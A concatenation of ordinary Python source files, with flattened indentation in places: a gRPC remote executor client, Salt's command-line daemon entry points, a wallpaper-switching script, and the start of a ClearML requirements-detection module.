response_event.set()
self._stream_closed_event.set()
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
self._is_initialized = True
@tracing.trace(span=True)
async def send_request(self, request):
"""Send a request on the bidi stream."""
self._lazy_init()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put((request, response_event))
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response # pytype: disable=attribute-error
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
if self._is_initialized:
logging.debug('Closing bidi stream')
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
else:
logging.debug('Closing unused bidi stream')
self._is_initialized = False
@tracing.trace(span=True)
def _request(rpc_func, request):
"""Populates trace context and reraises gRPC errors with retryable info."""
with tracing.wrap_rpc_in_trace_context():
try:
return rpc_func(request)
except grpc.RpcError as e:
if _is_retryable_grpc_error(e):
logging.info('Received retryable gRPC error: %s', e)
raise execution_context.RetryableError(e)
else:
raise
def _is_retryable_grpc_error(error):
"""Predicate defining what is a retryable gRPC error."""
non_retryable_errors = {
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.PERMISSION_DENIED,
grpc.StatusCode.FAILED_PRECONDITION,
grpc.StatusCode.ABORTED,
grpc.StatusCode.OUT_OF_RANGE,
grpc.StatusCode.UNIMPLEMENTED,
grpc.StatusCode.DATA_LOSS,
grpc.StatusCode.UNAUTHENTICATED,
}
return (isinstance(error, grpc.RpcError) and
error.code() not in non_retryable_errors) # pytype: disable=attribute-error
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance."""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None,
dispose_batch_size=20):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
dispose_batch_size: The batch size for requests to dispose of remote
worker values. Lower values will result in more requests to the remote
worker, but will result in values being cleaned up sooner and therefore
may result in lower memory usage on the remote worker.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
py_typecheck.check_type(dispose_batch_size, int)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
logging.debug('Creating new ExecutorStub with RPC_MODE=%s', rpc_mode)
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
self._dispose_batch_size = dispose_batch_size
self._dispose_request = executor_pb2.DisposeRequest()
if rpc_mode == 'STREAMING':
logging.debug('Creating Bidi stream')
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def close(self):
if self._bidi_stream is not None:
logging.debug('Closing bidi stream')
self._bidi_stream.close()
def _dispose(self, value_ref: executor_pb2.ValueRef):
"""Disposes of the remote value stored on the worker service."""
self._dispose_request.value_ref.append(value_ref)
if len(self._dispose_request.value_ref) < self._dispose_batch_size:
return
dispose_request = self._dispose_request
self._dispose_request = executor_pb2.DisposeRequest()
if self._bidi_stream is None:
_request(self._stub.Dispose, dispose_request)
else:
send_request_fut = self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(dispose=dispose_request))
# We don't care about the response, and so don't bother to await it.
# Just start it as a task so that it runs at some point.
asyncio.get_event_loop().create_task(send_request_fut)
@tracing.trace(span=True)
async def set_cardinalities(
self, cardinalities: Mapping[placement_literals.PlacementLiteral, int]):
serialized_cardinalities = executor_service_utils.serialize_cardinalities(
cardinalities)
request = executor_pb2.SetCardinalitiesRequest(
cardinalities=serialized_cardinalities)
if self._bidi_stream is None:
_request(self._stub.SetCardinalities, request)
else:
await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(set_cardinalities=request))
return
@tracing.trace(span=True)
async def create_value(self, value, type_spec=None):
@tracing.trace
def serialize_value():
return executor_service_utils.serialize_value(value, type_spec)
value_proto, type_spec = serialize_value()
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if self._bidi_stream is None:
response = _request(self._stub.CreateValue, create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
@tracing.trace(span=True)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if self._bidi_stream is None:
response = _request(self._stub.CreateCall, create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
@tracing.trace(span=True)
async def create_struct(self, elements):
constructed_anon_tuple = structure.from_container(elements)
proto_elem = []
type_elem = []
for k, v in structure.iter_elements(constructed_anon_tuple):
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateStructRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.StructType(type_elem)
request = executor_pb2.CreateStructRequest(element=proto_elem)
if self._bidi_stream is None:
response = _request(self._stub.CreateStruct, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_struct=request))).create_struct
py_typecheck.check_type(response, executor_pb2.CreateStructResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature, computation_types.StructType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if self._bidi_stream is None:
response = _request(self._stub.CreateSelection, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if self._bidi_stream is None:
response = _request(self._stub.Compute, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_service_utils.deserialize_value(response.value)
return value
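# --- Illustrative sketch, not part of the remote executor module ---
# The constructor docstring above explains `dispose_batch_size`: dispose requests are
# buffered locally and only sent to the remote worker once a full batch has
# accumulated, trading slightly later cleanup for fewer RPCs. The tiny helper below
# shows that buffering idea in plain Python; `flush_fn`, the class name and the
# default batch size are hypothetical and do not correspond to any TFF API.
class _DisposeBatcherSketch(object):
  def __init__(self, flush_fn, batch_size=20):
    self._flush_fn = flush_fn    # called with a list of value refs to dispose of
    self._batch_size = batch_size
    self._pending = []
  def dispose(self, value_ref):
    self._pending.append(value_ref)
    if len(self._pending) < self._batch_size:
      return                     # keep buffering, just like _dispose() above
    batch, self._pending = self._pending, []
    self._flush_fn(batch)        # one request cleans up the whole batch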
|
scripts.py
|
# -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import logging
import threading
import traceback
from random import randint
# Import salt libs
from salt import cloud, defaults
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
    '''
    If hardfailing:
        if we got the original stacktrace, log it, then
        raise the original exception in all cases, since it is logically
        part of the initial stack.
    Otherwise just let salt exit gracefully by raising the wrapping exception.
    '''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def salt_master():
'''
Start the salt master.
'''
import salt.cli.daemons
master = salt.cli.daemons.Master()
master.start()
def minion_process():
'''
Start a minion process
'''
import salt.utils
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.appendproctitle('KeepAlive')
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
        NOTE: there is a small race issue where the parent PID could be replaced
        by another process with the same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error('Minion process encountered exception: {0}'.format(exc))
os._exit(salt.defaults.exitcodes.EX_GENERIC)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
minion = salt.cli.daemons.Minion()
try:
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.warning('Fatal functionality error caught by minion handler:\n', exc_info=True)
log.warning('** Restarting minion **')
delay = 60
if minion is not None and hasattr(minion, 'config'):
delay = minion.config.get('random_reauth_delay', 60)
delay = randint(1, delay)
log.info('waiting random_reauth_delay {0}s'.format(delay))
time.sleep(delay)
exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
def salt_minion():
'''
Start the salt minion in a subprocess.
Auto restart minion on error.
'''
    import signal
    import functools
    import salt.utils
    import salt.cli.daemons
    import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(pid, signum, sigframe): # pylint: disable=unused-argument
'''
Escalate the signal received to the multiprocessing process that
is actually running the minion
'''
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(signal.SIGTERM,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGINT,
functools.partial(escalate_signal_to_process,
process.pid))
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
        # Process exited or was terminated. Since we're going to try to restart
        # it, we MUST reset signal handling to the previous handlers
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
break
        # on top of the random_reauth_delay already performed,
        # delay extra to reduce flooding and free resources
# NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
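# --- Illustrative sketch, not part of the Salt code base ---
# salt_minion() above is a keep-alive supervisor: it runs the minion in a child
# process, forwards SIGINT/SIGTERM to that child, and restarts the child only while
# it exits with the dedicated keep-alive exit code. The standalone function below
# shows the same supervision pattern with a hypothetical `worker` callable and a
# hypothetical exit code value; it is not Salt API.
def _keepalive_supervisor_sketch(worker, keepalive_exitcode=99):
    import functools
    import multiprocessing
    import os
    import signal
    def _forward(pid, signum, _frame):
        os.kill(pid, signum)  # escalate the signal to the child process
    while True:
        child = multiprocessing.Process(target=worker)
        child.start()
        previous = {s: signal.getsignal(s) for s in (signal.SIGINT, signal.SIGTERM)}
        for s in previous:
            signal.signal(s, functools.partial(_forward, child.pid))
        child.join()
        for s, handler in previous.items():
            signal.signal(s, handler)  # restore handlers before deciding to restart
        if child.exitcode != keepalive_exitcode:
            break  # a normal exit (or crash) ends the supervision loop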
def proxy_minion_process(queue):
'''
Start a proxy minion process
'''
    import salt.utils
    import salt.cli.daemons
# salt_minion spawns this function in a new process
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replace
with another process with the same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
proxyminion = None
try:
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.error('Proxy Minion failed to start: ', exc_info=True)
restart = True
except SystemExit as exc:
restart = False
if restart is True:
log.warning('** Restarting proxy minion **')
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, 'config'):
delay = proxyminion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of {0} seconds'.format(random_delay))
        # perform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
def salt_proxy_minion():
'''
Start a proxy minion.
'''
    import salt.utils
    import salt.cli.daemons
    import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception:
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception:
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
break
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
'''
Start the salt syndic.
'''
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
'''
Manage the authentication keys with salt-key.
'''
import salt.cli.key
client = None
try:
client = salt.cli.key.SaltKey()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
except Exception as err:
sys.stderr.write("Error: {0}\n".format(err.message))
def salt_cp():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.cp
client = None
try:
client = salt.cli.cp.SaltCPCli()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_call():
'''
Directly call a salt command in the modules, does not require a running
salt minion to run.
'''
import salt.cli.call
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.call.SaltCall()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_run():
'''
Execute a salt convenience routine.
'''
import salt.cli.run
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.run.SaltRun()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_ssh():
'''
Execute the salt-ssh system
'''
import salt.cli.ssh
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.ssh.SaltSSH()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit(err),
err,
hardcrash, trace=trace)
def salt_cloud():
'''
The main function for salt-cloud
'''
try:
import salt.cloud.cli
has_saltcloud = True
except ImportError as e:
log.error("Error importing salt cloud {0}".format(e))
# No salt cloud on Windows
has_saltcloud = False
if '' in sys.path:
sys.path.remove('')
if not has_saltcloud:
print('salt-cloud is not available in this system')
sys.exit(defaults.exitcodes.EX_UNAVAILABLE)
client = None
try:
client = cloud.cli.SaltCloud()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_api():
'''
The main function for salt-api
'''
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.salt
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.salt.SaltCMD()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_spm():
'''
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
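# --- Illustrative sketch, not part of the Salt code base ---
# Every console entry point above (salt_key, salt_cp, salt_call, salt_run, ...)
# repeats the same shutdown dance: build a client, run it, and on Ctrl-C look up
# `client.options.hard_crash` before delegating to _handle_interrupt(). The helper
# below sketches how that shared pattern could be factored out; `client_factory`
# is a hypothetical callable.
def _run_cli_sketch(client_factory):
    client = None
    try:
        client = client_factory()
        client.run()
    except KeyboardInterrupt as err:
        trace = traceback.format_exc()
        try:
            hardcrash = client.options.hard_crash
        except (AttributeError, KeyError):
            hardcrash = False
        _handle_interrupt(
            SystemExit('\nExiting gracefully on Ctrl-c'),
            err,
            hardcrash, trace=trace)
# e.g. salt_key() above could then be written as:
#   import salt.cli.key
#   _run_cli_sketch(salt.cli.key.SaltKey)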
|
wallpaper-switcher.py
|
import argparse
import importlib
import os
import random
import signal
import sys
import threading
import time
from collections import defaultdict
import json
import ntpath
import wallpaper_helper
img_transition = importlib.import_module("image-transition")
# TODO: add blur option
class WallpaperSwitcher:
recent_wp = defaultdict()
current_wp = ""
should_sleep = True
def __init__(self, wallpaper_folder=os.path.join(os.path.expanduser("~"), "Pictures"),
wait_time=120, transition=True,
fps_transition=20, quality_transition=100, num_of_images_transition=20, nsfw=False,
recursive=True, supported_images=None):
if supported_images is None:
supported_images = [".png", ".jpg", ".jpeg", ".bmp", ".jpg_large", ".webp"]
self.WP_FOLDER = wallpaper_folder
self.wait = wait_time
self.transition = transition
self.fps_trans = fps_transition
self.quality_tran = quality_transition
self.num_of_images_tran = num_of_images_transition
self.nsfw = nsfw
self.recursive = recursive
self.supported_images = supported_images
self.blur = False
print("-------------Settings-------------")
print("Wallpaper folder:", wallpaper_folder)
print("Delay:", wait_time)
print("Recursive:", recursive)
print("NSFW:", nsfw)
print("Transition:", transition)
print("FPS:", fps_transition)
print("Quality:", quality_transition)
print("Transition Length:", num_of_images_transition)
print("Supported Images:", supported_images)
print("-------------Settings-------------\n")
def load_history(self):
print("> Loading wallpaper history")
with open(".wallpaper-history.json", "r") as f:
data = f.read()
return json.loads(data)
def save_history(self):
with open(".wallpaper-history.json", "w") as f:
f.write(json.dumps(self.recent_wp, indent=4))
print("Saved wallpaper history")
def init_recent_wps(self):
if os.path.exists(".wallpaper-history.json"):
self.recent_wp = self.load_history()
else:
self.recent_wp = {file: float("-inf") for file in self.load_wallpapers()}
def load_wallpapers(self):
if self.recursive:
all_wallpapers = [os.path.join(dp, f) for dp, dn, fn in os.walk(self.WP_FOLDER) for f in fn
if (os.path.splitext(f)[1] in self.supported_images or not len(self.supported_images))
and not (not self.nsfw and "NSFW" in dp)]
else:
all_wallpapers = {os.path.join(self.WP_FOLDER, filename) for filename in os.listdir(self.WP_FOLDER)
if (os.path.splitext(filename)[1] in self.supported_images or
not len(self.supported_images))}
return all_wallpapers
def sort_wallpapers(self):
loaded_wallpapers = self.load_wallpapers()
print(f"\n> Loaded: {len(loaded_wallpapers)} Wallpapers")
if len(loaded_wallpapers) <= 0:
print("No Wallpapers found! Make sure that -recursive is enabled "
"or add more images to the selected directory.",
file=sys.stderr)
sys.exit()
wallpapers = {}
for filepath in loaded_wallpapers:
if filepath not in self.recent_wp:
self.recent_wp[filepath] = time.time() # New wallpaper
wallpapers[filepath] = self.recent_wp[filepath]
#print(json.dumps(sorted(wallpapers.items(), key=lambda kv: kv[1], reverse=True), indent=4))
        # Items with lower values end up at the back
        # A lower value means the item was picked longer ago => the last item was picked the longest time ago
wallpapers = [x[0] for x in sorted(wallpapers.items(), key=lambda kv: kv[1], reverse=True)]
return wallpapers
def choose_wallpaper(self):
wp = self.sort_wallpapers()
distributed_wps = []
for w in wp:
distributed_wps.extend(
[w] * (wp.index(w) + 1))
        # Item occurrence is determined by its index => higher index => more occurrences in the list => more likely to be picked
        # Due to the sorting, items with lower values (picked longer ago) are therefore more likely to be picked
random_wp = random.choice(distributed_wps)
try:
import cv2
height, width, _ = cv2.imread(random_wp).shape
except ImportError:
height, width = None, None
except AttributeError:
print(f"Could not load image: {random_wp}.")
            raise  # re-raise the AttributeError so the caller can skip this wallpaper
duplicates = sum([1 for item in distributed_wps if random_wp == item])
chance = (duplicates / len(distributed_wps)) * 100
print(
f"Random Wallpaper: {random_wp} [{width}x{height}] Chance: {chance:.2f}% : {duplicates} / {len(distributed_wps)}")
return random_wp
def favorite_wallpaper(self):
pass
def sleep(self):
print("> ", end="") # Fake input sign
self.should_sleep = True
f1 = threading.Thread(target=self.non_blocking_input)
f1.start()
t1 = time.time()
while time.time() - t1 <= self.wait and self.should_sleep:
time.sleep(1)
def non_blocking_input(self):
_input = input("").lower()
if _input in ["", "skip", "next"]:
print("Skipping Wallpaper!")
self.should_sleep = False
sys.exit(1) # Stop current thread
elif _input in ["quit", "exit"]:
print("> Exit")
self.save_history()
            os.kill(os.getpid(), signal.SIGKILL)  # forcefully kill the whole process
else:
print(f"command not found: {_input}\n")
print("> ", end="", flush=True)
self.non_blocking_input()
def run(self):
self.init_recent_wps()
print(f"Desktop Environment: {wallpaper_helper.get_desktop_environment()}")
while True:
old_wallpaper = self.current_wp
try:
new_wallpaper = self.choose_wallpaper()
except AttributeError:
continue
temp_dir = os.path.join(os.path.expanduser("~"), "temp_img")
if not os.path.exists(temp_dir):
os.mkdir(temp_dir)
if self.blur:
try:
import cv2
img = cv2.imread(new_wallpaper)
img = cv2.GaussianBlur(img, (17, 17), cv2.BORDER_DEFAULT)
new_wallpaper = os.path.join(temp_dir, "blur_"+ntpath.split(new_wallpaper)[1])
cv2.imwrite(new_wallpaper, img)
except ImportError:
pass
if old_wallpaper != "" and self.transition:
try:
itrans = img_transition.ImageTransition(input_image=old_wallpaper, output_image=new_wallpaper,
temporary_dir=temp_dir,
num_of_images=self.num_of_images_tran,
quality=self.quality_tran)
except IOError:
sys.stderr.write(f"Error loading Image: {new_wallpaper} or {old_wallpaper}")
                    quit()  # TODO: maybe skip this wallpaper instead; this needs proper handling
self.sleep()
for image_path in itrans.transition_brightness(fps=self.fps_trans):
wallpaper_helper.set_wallpaper(image_path, False) # can safely assume set_wp works (i hope)
else:
ret = wallpaper_helper.set_wallpaper(new_wallpaper, True)
if not ret:
sys.stderr.write("Critical Error: Shutting down")
self.save_history()
quit()
self.sleep()
self.recent_wp[new_wallpaper] = time.time()
self.current_wp = new_wallpaper
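# --- Illustrative sketch, not part of the WallpaperSwitcher class ---
# choose_wallpaper() above materialises a list in which the i-th wallpaper of the
# sorted order appears i + 1 times, so the wallpapers that were shown longest ago
# (at the end of the list) are the most likely picks. random.choices() can express
# the same linear weighting without building the duplicated list, as sketched here.
def _weighted_pick_sketch(sorted_wallpapers):
    import random
    weights = range(1, len(sorted_wallpapers) + 1)  # last (oldest) item gets the largest weight
    return random.choices(sorted_wallpapers, weights=weights, k=1)[0]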
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
    else:
        raise argparse.ArgumentTypeError("Boolean value expected, got {!r}".format(v))
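# --- Illustrative note on the str2bool helper above ---
# argparse has no native boolean parsing: passing `type=bool` would turn every
# non-empty string, including "False", into True. str2bool() is the usual
# workaround; the tiny self-check below just demonstrates the difference.
def _bool_parsing_demo():
    assert bool("False") is True        # why a plain type=bool would be wrong
    assert str2bool("False") is False   # the helper inspects the text instead
    assert str2bool("yes") is True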
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-f", "--wp_folder", required=True,
help="Folder of the Wallpapers")
ap.add_argument("-d", "--delay", default=10, type=int,
help="Delay in seconds until wallpaper switch")
ap.add_argument("-t", "--transition", type=str2bool, default=False,
help="Activates a transition between the wallpaper change")
ap.add_argument("--fps", default=20, type=int,
help="Frames Per Second for the transition")
ap.add_argument("-q", "--quality", default=100, type=int,
help="Quality of the transition images")
ap.add_argument("--len_transition", default=20, type=int,
help="Number of images used for the transition")
ap.add_argument("-nsfw", "--NSFW", default=False, type=str2bool,
help="Not Safe For Work (NSFW) images")
ap.add_argument("-r", "--recursive", default=True, type=str2bool,
help="Recursively choosing images (from all sub folders)")
ap.add_argument("-a", "--allowed_ext", default=[".png", ".jpg", ".jpeg", ".bmp", ".jpg_large", ".webp"], nargs="*",
help="Allowed Image extensions specified like thia: '.png', '.jpg'.. . No/Empty means all extensions")
args = vars(ap.parse_args())
wps = WallpaperSwitcher(wallpaper_folder=args["wp_folder"], wait_time=args["delay"], transition=args["transition"],
fps_transition=args["fps"],
quality_transition=args["quality"], num_of_images_transition=args["len_transition"],
nsfw=args["NSFW"], recursive=args["recursive"], supported_images=args["allowed_ext"])
try:
wps.run()
except KeyboardInterrupt:
wps.save_history()
sys.exit()
|
scriptinfo.py
|
import os
import sys
from copy import copy
from datetime import datetime
from functools import partial
from tempfile import mkstemp, gettempdir
import attr
import logging
import json
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output, remove_user_pass_from_url
from ....backend_api import Session
from ....config import config
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_max_requirements_size = 512 * 1024
_packages_remove_version = ('setuptools', )
_ignore_packages = set()
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = self._remove_package_versions(
get_installed_pkgs_detail(), self._packages_remove_version)
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
return self.create_requirements_txt(reqs, local_pks)
except Exception as ex:
_logger.warning("Failed auto-generating package requirements: {}".format(ex))
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3 # noqa: F401
modules.add('boto3', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage # noqa: F401
modules.add('google_cloud_storage', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings # noqa: F401
modules.add('azure_storage_blob', 'clearml.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
